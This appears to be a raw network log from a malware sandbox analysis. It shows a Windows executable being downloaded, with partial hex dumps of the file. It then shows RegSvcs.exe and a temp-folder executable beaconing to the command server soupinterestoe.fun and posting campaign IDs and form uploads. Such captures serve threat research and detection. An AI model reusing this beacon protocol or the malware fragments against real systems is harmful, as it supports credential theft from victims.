Dec 27, 2023 18:12:41.866363049 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:41 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 27 Dec 2023 17:00:01 GMT ETag: "2ce00-60d80bad775ec" Accept-Ranges: bytes Content-Length: 183808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c4 6c 00 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 2a 02 00 00 d2 42 00 00 00 00 00 a9 3c 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 44 00 00 04 00 00 69 05 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 6b 02 00 64 00 00 00 00 90 44 00 40 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 41 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 5e 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 28 02 00 00 10 00 00 00 2a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 34 00 00 00 40 02 00 00 36 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 06 42 00 00 80 02 00 00 18 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 51 00 00 00 90 44 00 00 52 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELldB<@@Di(kdD@QA^@@.text( `.rdata~4@6.@@.data\|Bd@.rsrc@QDR\|@@
Dec 27, 2023 18:12:41.866417885 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 56 8d 45 08 50 8b f1 e8 2f 28 00 00 c7 06 14 42 42 00 8b c6 5e 5d c2 04 00 cc cc cc cc c7 01 14 42 Data Ascii: UVEP/(BB^]BB(UVEtVC)^]UEQRUQR)]UEQRUQR8']ffh]B(UP
Dec 27, 2023 18:12:41.866478920 CET	1286	IN	Data Raw: 42 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 40 40 42 00 8b 45 fc 50 e8 79 fd ff ff 83 45 fc 08 83 6d f8 01 75 a2 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 c7 45 fc 00 00 00 00 81 45 fc 50 36 00 00 8b 45 fc 01 05 74 74 84 Data Ascii: Bjjjjjjj@@BEPyEmu_^[]UQEEP6Ett]QhB@BUdjh88BPd%= SVWjjEPjjj@Bjj@BMQjh\Bj@BURd@BujE#jj!
Dec 27, 2023 18:12:41.866494894 CET	1286	IN	Data Raw: cc cc 55 8b ec 8b 55 0c 8b 01 8b 40 1c 52 8b 55 08 6a ff 52 ff d0 5d c2 08 00 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 57 8b 7d 10 33 f6 89 4d fc 89 75 f8 85 ff 0f 8e 86 00 00 00 53 8b 5d 08 90 8b 45 fc e8 68 0b 00 00 85 c0 7e 32 3b f8 8b f0 Data Ascii: UU@RUjR]UVW}3MuS]Eh~2;}EVPEPSUu+u4MBEEUEuEFCuO[_^]_^]USW}3E~{VB~
Dec 27, 2023 18:12:41.866511106 CET	1286	IN	Data Raw: ff ff 84 c0 75 27 8d 45 08 e8 5e f2 ff ff 88 45 ff 8b c6 e8 04 06 00 00 8b d0 4a 8d 45 ff e8 09 f2 ff ff 84 c0 75 06 f6 46 40 02 75 43 83 c9 ff 8b d6 e8 25 06 00 00 8d 55 08 8d 45 f8 89 7d f8 e8 47 f2 ff ff 84 c0 75 13 8b c6 e8 cc 05 00 00 8b f0 Data Ascii: u'E^EJEuF@uC%UE}GuEEPG_^]'_^]Vu^Wk;s`_^F@uoltda8;w-9F<v
Dec 27, 2023 18:12:41.866524935 CET	1286	IN	Data Raw: 0c 56 8b f1 74 28 83 7e 18 10 72 22 8d 46 04 57 8b 38 85 db 76 0a 53 57 6a 10 50 e8 46 07 00 00 8b 46 18 40 50 57 8b ce e8 39 00 00 00 5f 53 8b ce c7 46 18 0f 00 00 00 e8 49 03 00 00 5e 5b 5d c2 08 00 cc cc cc 8b c1 c2 04 00 cc cc cc cc cc cc cc Data Ascii: Vt(~r"FW8vSWjPFF@PW9_SFI^[]UEP.]UM5]Udjh7BPd%VW}OH^BjEtY3G8M_d
Dec 27, 2023 18:12:41.866561890 CET	1286	IN	Data Raw: 5b 5d c2 08 00 e8 36 00 00 00 84 c0 74 28 8b 45 08 57 e8 99 fd ff ff 8b 4b 18 8d 04 70 50 51 8b c3 e8 8a 00 00 00 8b f0 e8 63 02 00 00 8b f7 8b c3 e8 3a ff ff ff 5f 5e 8b c3 5b 5d c2 08 00 cc e8 db 00 00 00 3b c7 73 05 e8 1e 07 00 00 39 7b 18 73 Data Ascii: []6t(EWKpPQc:_^[];s9{sCPWS3;uV3^3;)=]BwNH]Bv2xr@SV9wsG+;sv2+PHG+
Dec 27, 2023 18:12:41.866574049 CET	1286	IN	Data Raw: ff 75 08 e8 22 e3 ff ff 83 c4 10 5d c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 73 ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec 51 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 b0 ff ff ff 83 c4 14 c9 c3 8b ff 55 8b ec 51 ff 75 fc ff 75 Data Ascii: u"]Uuuuus]UQuuuuuUQuuuuujp6B}uvu%3j[OMmU;sjX+;w4eFP)EME@ePEE.@}u]}vr
Dec 27, 2023 18:12:41.866585970 CET	1286	IN	Data Raw: ff ff 6a ff 6a 00 ff 75 08 8b ce e8 44 ff ff ff 8b c6 5e 5d c2 04 00 6a 04 b8 fc 36 42 00 e8 bb 0f 00 00 8b f1 89 75 f0 8b 7d 08 57 e8 81 05 00 00 83 65 fc 00 83 c7 0c 57 8d 4e 0c c7 06 20 42 42 00 e8 a5 ff ff ff 8b c6 e8 f9 0f 00 00 c2 04 00 8b Data Ascii: jjuD^]j6Bu}WeWN BBUVu,BB^]UVu8BB^]VjPdYY^V6b6YY^lBBUEVlBBtVY^]UEt
Dec 27, 2023 18:12:41.866600990 CET	1286	IN	Data Raw: 10 74 e0 39 45 0c 73 0e e8 d5 2d 00 00 6a 22 59 89 08 8b f1 eb d7 50 ff 75 10 ff 75 08 e8 bc 28 00 00 83 c4 0c 33 c0 5f 5e 5d c3 8b c1 83 60 04 00 83 60 08 00 c7 00 84 42 42 00 c3 8b ff 55 8b ec 53 8b 5d 08 56 57 8b f9 c7 07 84 42 42 00 8b 03 85 Data Ascii: t9Es-j"YPuu(3_^]``BBUS]VWBBt&PFVH.YYGt3VP-gG_^[]UMBB`H]US]VBBCFCWt1t'P(GW-YYFtsWP-
Dec 27, 2023 18:12:42.108352900 CET	1286	IN	Data Raw: 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 1a 42 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 04 42 00 00 59 59 85 c0 74 31 c1 fb 02 50 8d 34 98 e8 c3 11 00 00 59 a3 68 86 84 00 ff 75 08 e8 b5 11 00 00 89 06 83 c6 04 56 e8 aa 11 00 00 Data Ascii: ;rPuBYYuG;r@PuBYYt1P4YhuVYdEY3_^[Vjj nAVhdujX^&3^jheBr><2euYEEE>2UuYH]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:48.171016932 CET	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soupinterestoe.fun
Dec 27, 2023 18:12:48.171047926 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 27, 2023 18:12:48.303843021 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QJDMlJrkGcftQDxU3fguXyM8BdXHYGYfkdKWhorx%2FknMmymTgJ378EPodJcSu73nCy%2FHV4xsgFJrhL4DnFcwVBmjRy2uXKMK8DOL%2FEsn64EXKG3WucBK15FBHHTnSUeHHzND4%2BY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330c578543acf-DFW Data Raw: 31 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 Data Ascii: 1276<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.cs
Dec 27, 2023 18:12:48.303858995 CET	1286	IN	Data Raw: 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 Data Ascii: s" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window
Dec 27, 2023 18:12:48.303869963 CET	1286	IN	Data Raw: 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f Data Ascii: nformation such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="6CVqwuw
Dec 27, 2023 18:12:48.303881884 CET	1286	IN	Data Raw: 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 Data Ascii: ext-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">83c330c578543acf</strong></span> <span class="cf-footer-sepa
Dec 27, 2023 18:12:48.303894043 CET	148	IN	Data Raw: 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a Data Ascii: </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 27, 2023 18:12:48.303905010 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 27, 2023 18:12:48.380004883 CET	349	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 66 Host: soupinterestoe.fun
Dec 27, 2023 18:12:48.380038023 CET	66	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 6c 65 67 65 6e 64 61 72 79 69 6e 73 74 61 6c 6c 73 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--legendaryinstalls&j=default
Dec 27, 2023 18:12:48.949536085 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8lu704g3fkf8e9kemri1l9ifp4; expires=Sun, 21-Apr-2024 10:59:27 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jRRnQP6tlicRVbzkTBtntzg8C5Jj2YifTXEvMttRkWD7Y9VumU7rqSLATZzuOuHHS1gPwd0AjnaEt0dvfa%2FZkUUrec95WEA0onam3CO1muwgp5g4NiqqYCaRQmtMv9kun83uT40%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330c6c9993ac Data Raw: Data Ascii:
Dec 27, 2023 18:12:48.949553013 CET	1286	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 34 33 63 38 0d 0a 4a 32 69 4d 64 59 2f 68 48 59 68 34 50 50 68 44 77 4a 43 56 51 32 68 6d 36 53 35 54 58 53 49 41 57 69 63 30 31 71 30 6d 51 68 78 63 5a 59 5a 56 72 38 45 39 71 67 34 65 77 6d 50 30 76 4a 68 4a 53 45 62 4a Data Ascii: -DFW43c8J2iMdY/hHYh4PPhDwJCVQ2hm6S5TXSIAWic01q0mQhxcZYZVr8E9qg4ewmP0vJhJSEbJDnEuRyJgB0Ck2ENuES1IrFWvw3zsWgbYJaH85iZEa+MOc30CIj9fFuyNfU8WB0isVa/BZoVyHNhj4LC1Y0hEjEBxZwIiP01Wt8FEI3dIGOAW54164B1fnCKs/fAmDQeDQDowSm14CzncjQZiPAdIrFWthGeqQhzaD
Dec 27, 2023 18:12:48.949563980 CET	1286	IN	Data Raw: 46 50 61 4e 42 6d 42 35 53 55 71 32 56 61 32 48 65 2b 59 61 57 5a 51 6c 70 50 2f 77 4b 67 63 4f 6a 45 41 34 4e 30 74 69 4e 45 70 56 73 73 64 50 4a 33 52 4e 41 4f 30 66 37 63 4d 78 68 58 49 63 32 47 50 67 73 4c 56 6a 53 45 53 4d 56 48 46 6e 41 69 Data Ascii: FPaNBmB5SUq2Va2He+YaWZQlpP/wKgcOjEA4N0tiNEpVssdPJ3RNAO0f7cMxhXIc2GPgsLVjSESMVHFnAiIDSEa5xARPFgdIrFWvwWCkdTbYY+CwtWMTa+MOc30CIHoHFPTISGAmB0rmF+uAcusWWZEqqf74KQoMhUkyMUpjP0tTtMhML3JODK5Zgus9qFgc2GPgsLcmEkTTDnETS2YuXhbbpwZiPAdIrAij7BeoWBzYY+DrmEl
Dec 27, 2023 18:12:48.949580908 CET	1286	IN	Data Raw: 31 37 53 67 44 38 48 2b 4f 4f 64 4f 55 52 54 4a 6f 73 70 76 37 7a 4b 51 45 4f 79 77 4a 65 56 77 49 67 65 67 63 55 39 6f 30 47 59 48 6c 64 53 72 5a 56 72 62 5a 79 35 52 70 64 6a 47 48 4e 6d 72 56 6a 53 45 62 4a 44 69 35 78 4c 77 70 36 42 78 54 32 Data Ascii: 17SgD8H+OOdOURTJospv7zKQEOywJeVwIgegcU9o0GYHldSrZVrbZy5RpdjGHNmrVjSEbJDi5xLwp6BxT2jQY5ES1IrFWvwT2oWB6dLeKqtWEGCotDPTNLajlJWLPKTSh2VwvqH+yNcOseW58lpfbxLkpK5CRzfQIgegcU9o9DOD4dSK44yrY9yyAe9UngsLVjSEaUAl5XAiB6BxT21itIPAdIrFWvwT2qHVLaeeCy+yIGDIRKO
Dec 27, 2023 18:12:49.009959936 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:49.385395050 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8akgtpsf235c87495ggdeu74ks; expires=Sun, 21-Apr-2024 10:59:28 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=20EZqlLsdc62DQUm5GzmajZQwW%2BBaVlZM8vGGgXwsi7Y3R9cCS2iXSjFBenRNnbZRZai7%2FAJ%2BmLjr03HYjPAHQ0Uh6QthN3d3dg4DLZK3ZzZNzVE2NIdXg6uI6esVfG4KBEszr8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330cabdf Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:49.709110975 CET	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soupinterestoe.fun
Dec 27, 2023 18:12:49.709172010 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 27, 2023 18:12:49.848618984 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ud8obcwBXd%2BZkVPCGJI5O0q0r5E0OsA21ioV9J2cqduPmzdhh5oaE6d7g%2Bm1dyv1lkxX%2BZnNG2eTk4fUcS%2BHsXteJKPDYJyKRabB9RQXdB6KQ%2FCd3wG3ewAUiR9a4FHCdLOsQjk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330cf1b722cb0-DFW Data Raw: 31 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 